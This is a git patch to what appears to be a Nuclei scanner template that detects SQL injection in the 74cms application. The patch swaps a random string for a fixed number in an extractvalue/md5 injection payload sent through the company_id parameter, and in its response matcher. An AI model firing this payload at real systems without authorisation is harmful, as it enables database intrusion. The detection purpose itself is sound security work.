From b1f9fc94d6ba3e8cc31d0b7b6d8ca419e95e20b7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 30 Jun 2022 08:29:32 +0530 Subject: [PATCH] Update 74cms-sqli.yaml --- vulnerabilities/other/74cms-sqli.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/74cms-sqli.yaml b/vulnerabilities/other/74cms-sqli.yaml index 3c0db5de4a..b5e1b8670b 100644 --- a/vulnerabilities/other/74cms-sqli.yaml +++ b/vulnerabilities/other/74cms-sqli.yaml @@ -14,15 +14,18 @@ info: cwe-id: CWE-89 tags: 74cms,sqli +variables: + num: "999999999" + requests: - method: GET path: - - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5("{{randstr}}"))) -- a' + - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5({{num}}))) -- a' matchers: - type: word words: - - '{{md5("{{randstr}}")}}' + - '{{md5({{num}})}}' part: body # Enhanced by ritikchaddha on 2022/05/05